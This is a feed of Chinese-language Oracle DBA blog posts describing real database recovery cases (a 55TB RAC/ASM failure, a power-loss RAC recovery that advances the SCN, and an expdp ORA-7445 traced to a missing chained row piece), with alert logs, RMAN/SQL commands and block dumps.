  5. 某网友的数据库TB 数据库恢复

一个55TB的Oracle RAC (ASM)恢复case

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 一个55TB的Oracle RAC (ASM)恢复case

前几天某客户的一个数据库出现故障,需要我们紧急救援支持。了解了一下环境,着实也吓了一跳,数据量55TB左右。首先我们来看看故障的信息:

 

Fri Mar 25 22:57:10 2016
Errors in file /oracle/app/oracle/diag/rdbms/njsdb/njsdb1/trace/xxxx1_dia0_30474350.trc  (incident=640081):
ORA-32701: Possible hangs up to hang ID=80 detected
Incident details in: /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/incident/incdir_640081/xxxx1_dia0_30474350_i640081.trc
DIA0 requesting termination of session sid:10347 with serial # 16419 (ospid:29884706) on instance 2
    due to a LOCAL, HIGH confidence hang with ID=80.
    Hang Resolution Reason: Although the number of affected sessions did not
    justify automatic hang resolution initially, this previously ignored
    hang was automatically resolved.
DIA0: Examine the alert log on instance 2 for session termination status of hang with ID=80.
Fri Mar 25 22:59:26 2016
minact-scn: useg scan erroring out with error e:12751
Suspending MMON action 'Block Cleanout Optim, Undo Segment Scan' for 82800 seconds
Fri Mar 25 22:59:35 2016
Sweep [inc][640081]: completed
Sweep [inc2][640081]: completed
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw7_27263388.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
WARNING: Write Failed. group:3 disk:35 AU:241007 offset:262144 size:8192
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_ora_10289540.trc:
ORA-27072: File I/O error
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: 7
Additional information: 41229344
Additional information: -1
WARNING: Read Failed. group:3 disk:35 AU:20131 offset:540672 size:8192
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw7_27263388.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
WARNING: Write Failed. group:3 disk:35 AU:241007 offset:237568 size:8192
Fri Mar 25 22:59:57 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
。。。。。。
WARNING: failed to write mirror side 1 of virtual extent 5096 logical extent 0 of file 583 in group 3 on disk 35 allocation unit 241007
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-27063: number of bytes read/written is incorrect
IBM AIX RISC System/6000 Error: 78: Connection timed out
Additional information: -1
Additional information: 8192
。。。。。。
ORA-15080: synchronous I/O operation to a disk failed
WARNING: failed to write mirror side 1 of virtual extent 5096 logical extent 0 of file 583 in group 3 on disk 35 allocation unit 241007
WARNING: failed to write mirror side 1 of virtual extent 5002 logical extent 0 of file 585 in group 3 on disk 35 allocation unit 242538
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_dbw3_30212292.trc:
ORA-15080: synchronous I/O operation to a disk failed

从前面的日志可以看出,该数据库节点从25号22:57开始报错,开始可能是出现了部分session hung的情况,接着出现了写失败的操作。而其中写失败的是第35个磁盘。

当然,这里仅仅是一个warning,因此我们还不能判断是磁盘是否有问题。

后面我们跟客户了解,当时的现象应该是存储链路出现了异常,导致数据库IO出现异常。这也符合之前的现象描述。

那么我们进一步分析后面客户的操作,看看之前他们都进行了哪些相关的操作?

 

Sat Mar 26 01:13:51 2016
ALTER DATABASE OPEN
This instance was first to open
Abort recovery for domain 0
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_ora_27853116.trc:
ORA-01113: file 763 needs media recovery
ORA-01110: data file 763: '+DATA/xxxx/datafile/ts_icp_bill.1028.881083603'
ORA-1113 signalled during: ALTER DATABASE OPEN...
Sat Mar 26 01:14:14 2016
......
......
Sat Mar 26 02:02:14 2016
ALTER DATABASE RECOVER  database
Media Recovery Start
 started logmerger process
Sat Mar 26 02:02:18 2016
WARNING! Recovering data file 763 from a fuzzy backup. It might be an online
backup taken without entering the begin backup command.
。。。。。
WARNING! Recovering data file 779 from a fuzzy backup. It might be an online
backup taken without entering the begin backup command.
Sat Mar 26 02:02:18 2016
。。。。。。
Sat Mar 26 02:04:15 2016
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_pr00_36110522.trc:
ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DATA/xxxx/datafile/system.261.880958693'
Slave exiting with ORA-1547 exception
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_pr00_36110522.trc:
ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DATA/xxxx/datafile/system.261.880958693'
ORA-1547 signalled during: alter database recover cancel...
Sat Mar 26 02:04:43 2016

 

我们可以看到,客户进行了正常的alter database open,但是Oracle提示有部分文件需要recover。那么进行recover database操作呢,则提示有部分文件可能来自fuzzy backup.

这是什么意思呢? 这其实是说这几个文件的检查点比较旧,需要很早之前的日志来进行recover。

由于这是一个非归档的数据库,因此很可能有问题的这几个文件需要日志已经被覆盖。

通过比较scn,我们可以判断这几个文件需要的redo信息已经被覆盖了。这里我要提醒大家的是,不要仅仅只看alert log就轻易下判断。

仅仅看alert log我们可能认为只有几个文件问题。后续我想,如果是仅仅有几个文件有问题,那么我跳过这部分文件进行recover 不就行了吗? 因为这样可以实现数据的最大程度恢复。

于是我执行了下面的命令:

 

run {
set until scn 14586918070973;
recover database skip forever tablespace ts_icp_bill,ts_icp_bill_idx,ts_wj_bill,ts_wj_bill_idx,ts_js_bill;
}

上面这个命令,其实是比较致命的,因为Oracle 会将这里skip的表空间里面的文件全部进行offline drop。

所以这里其实上述的做法是有些欠妥的。

我进一步根据文件的scn和v$log的scn 信息进行比较,发现其实有605个文件可能都需要进行recover;因为全库已经有2000个左右的数据文件。

这里我根据scn进行大致判断然后产生2个脚本进行文件级别的recover,大致获取脚本如下:

spool recover1.sh
set pagesize 160 long 9999
select 'recover datafile '||file#||';'  from v$datafile_header where checkpoint_change# < xxx;
spool off

 

通过将其他能够进行正常recover的文件进行恢复之后,尝试打开数据库。居然能够正常open数据库。有些人可能已经到此结束了吧,其实并不然。

大家想一下?虽然数据库打开了,我们不能正常recover的605个数据文件中可能还有部分数据文件状态是recover,也就是还不是online的状态。

这种情况之下,业务是无法访问的。实际上我这里查了一下,大概有540个文件状态仍然是recover。因此我们现在还需要想办法怎么去讲这部分文件online。

处理方法其实并不难,比如通过bbed简单修改下数据文件头的checkpoint信息,就可以完成了。但是有540个文件,而且都是ASM环境。

这个修改的工作量可想而已。后面再产生一个脚本,将数据库启动到mount状态,然后将之前状态为recover的文件全部online。

然后进行recover database using backup controlfile操作。接着直接进行alter database open resetlogs。

遗憾的是没有能够直接打开数据库,报了一个如下的错误,该错误很常见,mos有问题也提到,可能跟temp有关系。

 

 

 

 

 

 

 

 

 

这里我这里直接将tempfile 进行drop,然后再重建控制文件,进行recover后,居然直接打开数据库了。

检查alert log,我发现还存在一个如下的错误:

 

Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: +DATA/xxxx/onlinelog/group_1.2177.907527869
  Mem# 1: +FRA/xxxx/onlinelog/group_1.263.907527881
Block recovery completed at rba 1.46.16, scn 3396.1209160607
ORACLE Instance xxxx1 (pid = 26) - Error 607 encountered while recovering transaction (12, 33) on object 143154.
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [6856], [0], [1], [], [], [], [], [], [], [], [], []
Sat Mar 26 19:05:43 2016
Dumping diagnostic data in directory=[cdmp_20160326190543], requested by (instance=1, osid=10289168 (SMON)), summary=[incident=2400209].
Starting background process QMNC
Sat Mar 26 19:05:44 2016
QMNC started with pid=40, OS id=17432578
LOGSTDBY: Validating controlfile with logical metadata
LOGSTDBY: Validation complete
Sat Mar 26 19:05:45 2016
Sweep [inc][2400209]: completed
Sweep [inc2][2400209]: completed
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc  (incident=2400210):
ORA-00600: internal error code, arguments: [6856], [0], [13], [], [], [], [], [], [], [], [], []
Incident details in: /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/incident/incdir_2400210/xxxx1_smon_10289168_i2400210.trc
Dumping diagnostic data in directory=[cdmp_20160326190545], requested by (instance=1, osid=10289168 (SMON)), summary=[abnormal process termination].
Starting background process CJQ0
Sat Mar 26 19:05:46 2016
CJQ0 started with pid=43, OS id=11010116
Sat Mar 26 19:05:47 2016
db_recovery_file_dest_size of 2047887 MB is 0.21% used. This is a
user-specified limit on the amount of space that will be used by this
database for recovery-related files, and does not reflect the amount of
space available in the underlying filesystem or ASM diskgroup.
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Block recovery from logseq 1, block 60 to scn 14586918097855
Recovery of Online Redo Log: Thread 1 Group 1 Seq 1 Reading mem 0
  Mem# 0: +DATA/xxxx/onlinelog/group_1.2177.907527869
  Mem# 1: +FRA/xxxx/onlinelog/group_1.263.907527881
Dumping diagnostic data in directory=[cdmp_20160326190547], requested by (instance=1, osid=10289168 (SMON)), summary=[incident=2400210].
Block recovery completed at rba 1.91.16, scn 3396.1209160640
ORACLE Instance xxxx1 (pid = 26) - Error 607 encountered while recovering transaction (15, 3) on object 143247.
Errors in file /oracle/app/oracle/diag/rdbms/xxxx/xxxx1/trace/xxxx1_smon_10289168.trc:
ORA-00607: Internal error occurred while making a change to a data block
ORA-00600: internal error code, arguments: [6856], [0], [13], [], [], [], [], [], [], [], [], []
Starting background process SMCO
Dumping diagnostic data in directory=[cdmp_20160326190549], requested by (instance=1, osid=10289168 (SMON)), summary=[abnormal process termination].
Sat Mar 26 19:05:49 2016
SMCO started with pid=46, OS id=2949376
Setting Resource Manager plan SCHEDULER[0x3198]:DEFAULT_MAINTENANCE_PLAN via scheduler window
Setting Resource Manager plan DEFAULT_MAINTENANCE_PLAN via parameter
Sat Mar 26 19:05:49 2016

 

很明显,上述错误是指smon进程在进行事务恢复时,发现有2个事务无法进行恢复。

看到上述的错误,或许有人会说可能是undo出现损坏,导致无法进行事务恢复。实际上这里并不是,我通过dbv检查发现undo文件都是完好的。

无论怎讲,这里要解决这个问题,相对简单,定位到是什么对象,重建就好。

Related posts:

  1. One recover case!
  2. windows Oracle数据文件大小为0的恢复case
  3. 某客户ERP系统Oracle 8.0.5恢复一例
  4. ORA-15196: invalid ASM block header [kfc.c:26076] [hard_kfbh]
  5. ORA-03137: TTC protocol internal error : [3113] in 11.2.0.4

清明节加班恢复的一个11gR2 rac恢复案例

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 清明节加班恢复的一个11gR2 rac恢复案例

这是昨天节假如接到的某客户的紧急救援数据恢复案例。大致的情况是由于掉电导致数据库无法open。经过初步排查,确认数据库版本为Oracle 11.2.0.3(linux RAC),数据量比较小,

大约200G左右。整个恢复过程开始看上去很顺利,仅30分钟就顺利打开了数据库,后续发现其中确实有少坑,这里跟大家简单分享一下这个清明节加班的恢复case。

首先我们来看下数据库无法open所报的错误是什么?

 

Sun Apr 03 20:55:36 2016
SMON: enabling cache recovery
ORA-01555 caused by SQL statement below (SQL ID: 4krwuz0ctqxdt, SCN: 0x0000.5edc85a7):
select ctime, mtime, stime from obj$ where obj# = :1
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_19990.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 29 with name "_SYSSMU29_3872709797$" too small
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_19990.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 29 with name "_SYSSMU29_3872709797$" too small
Error 704 happened during db open, shutting down database
USER (ospid: 19990): terminating the instance due to error 704
Instance terminated by USER, pid = 19990
ORA-1092 signalled during: alter database open...
opiodr aborting process unknown ospid (19990) as a result of ORA-1092

这个错误其实很常见,已经遇到很多次了,处理方式也不难;大致上有两种.
1、通过10046 trace定位到有问题的数据块,然后手工去屏蔽事务;

2、推进数据库SCN
这里我选择使用推进scn的方式来进行处理。

直接通过oradebug poke修改scn;第一次修改可能是增加的scn不够大;第一次报错一样;第二次报错改变了;变成我们更加熟悉的错误:

 

Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc  (incident=2108431):
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Incident details in: /u01/app/oracle/diag/rdbms/orcl/orcl1/incident/incdir_2108431/orcl1_ora_23188_i2108431.trc
Sun Apr 03 21:09:46 2016
Dumping diagnostic data in directory=[cdmp_20160403210946], requested by (instance=1, osid=23188), summary=[incident=2108431].
Sun Apr 03 21:09:46 2016
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc:
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl1/trace/orcl1_ora_23188.trc:
ORA-00600: internal error code, arguments: [2662], [0], [2200563965], [0], [2200568242], [20971648], [], [], [], [], [], []
Error 600 happened during db open, shutting down database
USER (ospid: 23188): terminating the instance due to error 600

上述的这个错误处理方式其实也有2种,大致如下:
1、由于scn差距很小,因此直接适当推进scn即可。

2、bbed修改dba地址20971648 中的事务来绕过该错误。

很明显,这里我选择第1种方法更简单;这里我再次修改scn,稍微增加大一点即可;很顺利的打开了数据库。

 

SQL> startup mount pfile='/tmp/pfile.ora';
ORACLE instance started.

Total System Global Area 2.0243E+10 bytes
Fixed Size		    2237088 bytes
Variable Size		 7449087328 bytes
Database Buffers	 1.2751E+10 bytes
Redo Buffers		   41189376 bytes
Database mounted.
SQL> oradebug setmypid
Statement processed.
SQL> alter system set job_queue_processes=0;

System altered.

SQL> oradebug poke 0x060019598  4 0x832B8852
BEFORE: [060019598, 06001959C) = 00000000
AFTER:	[060019598, 06001959C) = 832B8852
SQL> alter database open;

Database altered.

SQL>

看上去整个恢复过程很简单,也就不到半小时就打开了数据库。可是当我检查数据库文件状态时,整个数据库一共有23个数据文件,其中有11个数据文件状态为missing,

这也就是说都无法识别到数据库文件。实际上此时数据库alert log中也在报如下的错误,告诉我们这部分数据文件无法识别:

 

Sun Apr 03 21:26:09 2016
minact-scn: Inst 1 is now the master inc#:2 mmon proc-id:24523 status:0x7
minact-scn status: grec-scn:0x0000.00000000 gmin-scn:0x0000.00000000 gcalc-scn:0x0000.00000000
[24583] Successfully onlined Undo Tablespace 2.
Undo initialization finished serial:0 start:123081664 end:123083044 diff:1380 (13 seconds)
Dictionary check beginning
Tablespace 'NORMING_DATA' #10 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMING_TEMP' #11 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGTEST_TEMP' #12 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGTEST_DATA' #13 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGLJ_TEMP' #14 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'NORMINGLJ_DATA' #15 found in data dictionary,
but not in the controlfile. Adding to controlfile.
Tablespace 'TABLESPACE_XYZH' #16 found in data dictionary,
but not in the controlfile. Adding to controlfile.
File #13 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00013' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #14 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00014' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #15 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00015' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #16 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00016' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #17 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00017' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #18 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00018' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #19 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00019' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #20 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00020' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #21 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00021' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #22 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00022' in the controlfile.
This file can no longer be recovered so it must be dropped.
File #23 found in data dictionary but not in controlfile.
Creating OFFLINE file 'MISSING00023' in the controlfile.
This file can no longer be recovered so it must be dropped.
Dictionary check complete

由于此时数据库已经打开了,因此为产生了一个重建控制文件的脚本,发现脚本内容如下:

 

STARTUP NOMOUNT
CREATE CONTROLFILE REUSE DATABASE "ORCL" RESETLOGS  ARCHIVELOG
    MAXLOGFILES 192
    MAXLOGMEMBERS 3
    MAXDATAFILES 1024
    MAXINSTANCES 32
    MAXLOGHISTORY 9344
LOGFILE
  GROUP 1 '+DATA/orcl/onlinelog/group_1.273.850670135'  SIZE 50M BLOCKSIZE 512,
  GROUP 2 '+DATA/orcl/onlinelog/group_2.274.850670135'  SIZE 50M BLOCKSIZE 512
-- STANDBY LOGFILE
DATAFILE
  '+DATA/orcl/datafile/system.268.850670033',
  '+DATA/orcl/datafile/sysaux.269.850670033',
  '+DATA/orcl/datafile/undotbs1.270.850670033',
  '+DATA/orcl/datafile/users.271.850670033',
  '+DATA/orcl/datafile/undotbs2.276.850670237',
  '+DATA/orcl/datafile/datacenter',
  '+DATA/orcl/datafile/partner_platform',
  '+DATA/orcl/datafile/sw_portal',
  '+DATA/orcl/datafile/system.dbf',
  '+DATA/orcl/datafile/system_02.dbf',
  '+DATA/orcl/datafile/user_02.dbf',
  '+DATA/orcl/datafile/user_03.dbf',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00013',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00014',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00015',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00016',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00017',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00018',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00019',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00020',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00021',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00022',
  '/u01/app/oracle/product/11.2.0/db_1/dbs/MISSING00023'
CHARACTER SET ZHS16GBK;

实际上我问客户,他们的反馈是之前由于控制文件损坏,客户也重建了控制文件,进行了多次恢复,而且也进行了resetlogs操作。

从上面的信息来看,不难看出客户重建控制文件的时候漏掉了11个数据文件。由于这部分文件的信息在数据字典中存在,因此在open的时候Oracle 会自动进行offline drop
或许有人要说,直接找到文件然后重建控制文件不就行了吗?确实如此,然而实际上这里却并没有这么简单。
我进入到asm磁盘组检查文件发现有几个文件名称很奇怪,例如user_02.dbf 实际上link到了system,类似这样的情况。
这种情况下极容易出错。争取的做法查询dba_data_files进行数据文件的挨个确认。
确认好asm磁盘组漏掉的4个文件之后,还有7个文件位于文件系统中。全部添加到脚本中进行创建时发现这些文件和之前到文件到resetlogs已经完全不同了。
其实创建控制文件会报错ora-01189。
因此这里还必须手工去修改这11个数据文件头的resetlogs信息;等我将resetlogs信息全部修改完毕后,可以顺利创建控制文件。
但是当我进行reconver时却发现需要之前等archivelog,进一步检查发现归档日志都全部被删掉了。
因此最后还必须的再次修改这部分数据文件的checkpoint信息,将其改成与其他正常的文件一致,最后可以顺利打开数据库,

且检查所有的数据库文件状态均为online状态,如下所示:

最后再将文件系统的文件迁移到asm磁盘组,然后添加redo信息,启动rac节点2.

Related posts:

  1. One recover case!
  2. windows Oracle数据文件大小为0的恢复case
  3. 11.2.0.4 ASM RAC 恢复一个例子
  4. 某大学的数据库恢复过程
  5. 数套ASM RAC的恢复案例

expdp 报错ORA-7445 的一个问题展开

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: expdp 报错ORA-7445 的一个问题展开

某客户说一套数据库由于非正常关机重启之后,进行数据导出发现报错,expdp无法正常工作,报错之后直接退出:

处理对象类型 SCHEMA_EXPORT/JOB
. . 导出了 "STATS"."T_REPORT_MONTH_TEMPS"              988.2 MB 1292221 行
ORA-39014: 一个或多个 worker 进程已过早地退出。
ORA-39029: worker 进程 1 (进程名为 "DW01") 过早地终止
ORA-31672: Worker 进程 DW01 意外停止。

作业 "SYS"."SYS_EXPORT_SCHEMA_04" 因致命错误于 23:58:10 停止

而检查此时的alert log可以发现有如下类似的错误:

Errors in file /u01/app/oracle/admin/orcl/bdump/orcl_dw01_28608.trc:
ORA-07445: 出现异常错误: 核心转储 [klufprd()+321] [SIGSEGV] [Address not mapped to object] [0x000000000] [] []

从上面的信息我们可以得到如下几个结论:

1、expdp的写进程报错,因为日志产生是dw进程。

2、dw进程报错的原因是遭遇了ora-07445 [klufprd()+321]错误。

3、对于[klufprd()+321] 这个函数,非常少见。但是从前面2点我们可以知道这肯定与buffer cache有关系。
所以要临时解决这个问题也很简单。通过alter system flush buffer_cache 刷新缓存之后,再次进行expdp操作.
后续客户尝试了之后,发现expdp 操作虽然仍然会报错,但是expdp 不会异常终止,会继续完成后面其他对象的导出。

进一步分析报错的信息可以看到,有如下这样的提示:

*** SESSION ID:(2760.1968) 2016-04-08 00:14:14.347
            row 01808438.0 continuation at
            file# 6 block# 33784 slot 14 not found
**************************************************
KDSTABN_GET: 0 ..... ntab: 1
curSlot: 14 ..... nrows: 14
**************************************************
*** 2016-04-08 00:14:14.348
ksedmp: internal or fatal error
ORA-00600: ÄÚ²¿´íÎó´úÂë, ²ÎÊý: [kdsgrp1], [], [], [], [], [], [], []
Current SQL statement for this session:
SELECT /*+NESTED_TABLE_GET_REFS+*/ "STATS"."T_REPORT_MONTH".* FROM "STATS"."T_REPORT_MONTH"
----- Call Stack Trace -----

很明显,这里提到这个这个表,恰好就是expdp报错所遇到的表,只不过我们刷新buffer cache之后,expdp可以跳过这个表继续完成其他对象的导出。
从上述的信息来看,这里存在错误。客户也意识到,通过dbv 对数据文件进行检查,但是发现文件并没有损坏。
这里我们要注意,dbv 同时是检查物理坏块,对于逻辑坏块通常无能为力,当然块内的逻辑错误,这类型的块dbv是可以检查出来的。
但是从这里的信息来看,Oracle发现所需要的这行记录row 01808438.0 应该在file 6 block 33784 中找到,但是却并没有发现。
注意,这里的file 6 block 33784 本身是完好的。
那么这里的row 01808438.0 表示什么含义呢?
其实这是表示的nrid;这可以理解为一直指针;其中前面一部分是表现rdba地址,后面表现行编号。
如果要进一步分析为什么会这个错误,我们怎么办呢? 很简单,分别将block 33784以及rdba 01808438(16进制) 进行dump。 如下是转换的脚本:

SQL>  SELECT dbms_utility.data_block_address_block(25199672) "BLOCK",
  2         dbms_utility.data_block_address_file(25199672) "FILE"
  3      FROM dual;

    BLOCK       FILE
---------- ----------
     33848          6

日志报错中提到的是row 01808438.0 ,那么我们首先来分析file 6 block 33848的dump:

Block header dump:  0x01808438
 Object id on Block? Y
 seg/obj: 0xc03d01  csc: 0xb37.78b5ae28  itc: 3  flg: E  typ: 1 - DATA
     brn: 0  bdba: 0x1807d8a ver: 0x01 opc: 0
     inc: 0  exflg: 0

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x000a.02d.000cdc5c  0x00809c91.6507.21  --U-    2  fsc 0x0001.78b6a4b1
0x02   0x000a.014.000cdd00  0x00806957.650d.15  --U-    2  fsc 0x0000.78b6ec5d
0x03   0x000a.025.000cdd5d  0x00801e50.650f.0a  --U-    2  fsc 0x0000.78b71584

data_block_dump,data header at 0x1fb2f87c
===============
tsiz: 0x1f80
hsiz: 0x34
pbl: 0x1fb2f87c
bdba: 0x01808438
     76543210
flag=--------
ntab=1
nrow=17
frre=-1
fsbo=0x34
fseo=0xd2
avsp=0x33b
tosp=0x33c
0xe:pti[0]	nrow=17	offs=0
0x12:pri[0]	offs=0x1e34
......
0x30:pri[15]	offs=0x6e2
0x32:pri[16]	offs=0x583
block_row_dump:
tab 0, row 0, @0x1e34
tl: 332 fb: --H-F--- lb: 0x0  cc: 79
nrid:  0x018083f8.e
col  0: [ 5]  c4 04 5a 27 1b
col  1: [ 7]  47 59 30 32 30 30 31
col  2: [ 4]  c3 15 11 04
col  3: [12]  31 38 37 33 34 34 32 30 30 30 30 36
col  4: [12]  31 34 30 34 34 34 32 30 30 30 30 31
col  5: [30]
......

上述类似表示的是rdba 地址01808438的第0行,也就是我们大家所理解的第一行。我们可以发现这行记录中,行头存在一个nrid地址。
说到nrid地址,这通常是针对行链接,行迁移才会遇到的一种情况。那么这里为什么会出现呢?
行迁移几种,最常见的一种其实是block内的。一个block中单条记录的最大列数是255列,当一行记录的列超过255时,其他的列数据库会被oracle 分成另外一个row piece存在同一个block中(当然也有可能存到其他block)。
也就是说超过255列的行数据,会被分成多个row piece;而当我们读取这个行数据时,怎么知道是一个完整的整体呢?
答案就是nrid,oracle 通过nrid来将这多个row piece 串在一起,组成一个完整的行数据。

想到这一点,那么我们再回头去看下前面的错误。row 01808438.0 表示这个block的第0行,而该block的第0行所存在的nrid地址是:0x018083f8.e
那么我们进一步到block 0x018083f8中去寻找第e行记录,发现结果是这样的:

 Object id on Block? Y
 seg/obj: 0xc03d01  csc: 0xb37.78bb5e9f  itc: 3  flg: E  typ: 1 - DATA
     brn: 0  bdba: 0x1807d8a ver: 0x01 opc: 0
     inc: 0  exflg: 0

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x000a.013.000cdc01  0x01c02834.6573.33  --U-    2  fsc 0x0000.78cbf31d
0x02   0x000a.001.000cda7a  0x0080150a.64d3.21  C---    0  scn 0x0b37.78b584df
0x03   0x000a.01e.000cdade  0x00801510.64d3.13  C-U-    0  scn 0x0b37.78b99f21

data_block_dump,data header at 0x2b4fc709007c
===============
tsiz: 0x1f80
hsiz: 0x2e
pbl: 0x2b4fc709007c
bdba: 0x018083f80x018083f8
     76543210
flag=--------
ntab=1
nrow=14
frre=-1
fsbo=0x2e
fseo=0x568
avsp=0x53a
tosp=0x53a
0xe:pti[0]	nrow=14	offs=0
0x12:pri[0]	offs=0x1d78
0x14:pri[1]	offs=0x1c37
......
0x2a:pri[12]	offs=0x6c2
0x2c:pri[13]	offs=0x568
block_row_dump:
tab 0, row 0, @0x1d78
tl: 520 fb: -----L-- lb: 0x0  cc: 255
......
tab 0, row 13, @0x568
tl: 346 fb: --H-F--- lb: 0x1  cc: 79
nrid:  0x018083f8.c
col  0: [ 5]  c4 04 5a 3a 0a
col  1: [ 7]  47 59 30 32 30 30 31
col  2: [ 4]  c3 15 11 04
......
col 76: [ 1]  80
col 77: [ 1]  80
col 78: [ 1]  80
end_of_block_dump
End dump data blocks tsn: 6 file#: 6 minblk 33784 maxblk 33784

我们可以看到这里对应的记录根本就没有。因为该block最后一条记录是row 13,也就是第14行,也是一个row piece,而且存在一个nrid。
该nrid是0x018083f8.c,这表示该block 33784第12行记录。跟row 13是组合成一条完整行记录的。
换句话说,我们前面报错的那条记录,应该有2个row piece,其中一个row piece 是存在的,其中一个row piece 本应该存在在33784 block中。
但是由于找不到该row piece,因此oracle报了上述的错误。
实际上该错误遇到之后,我们通常以为是index的问题,通过drop 重建可以解决,然而这里的问题比较特殊,据说是表的数据有问题。
所以这就是为什么客户重建index会报错的原因:

SQL> CREATE INDEX "STATS"."MONTHINDEX_STATUS2" ON "STATS"."T_REPORT_MONTH" ("TARGET_298", "UNIT_LEVEL", "TARGET_VAL", "MONTH_FLG")
  2    TABLESPACE "STATDATA" ;
CREATE INDEX "STATS"."MONTHINDEX_STATUS2" ON "STATS"."T_REPORT_MONTH" ("TARGET_298", "UNIT_LEVEL", "TARGET_VAL", "MONTH_FLG")
                                                     *
第 1 行出现错误:
ORA-00600: 内部错误代码, 参数: [kdsgrp1], [], [], [], [], [], [], []

最后,我们清楚了所有原因,那么要解决该问题很简单。通过rowid的方式跳过这行有问题的记录,将其他数据取出,重建表即可。

备注:关于块内的行迁移问题,可以参考之前的文章  http://www.killdb.com/2013/06/19/intra-blcok-chain.html

No related posts.

Insert into is very slowly,why ?

$
0
0

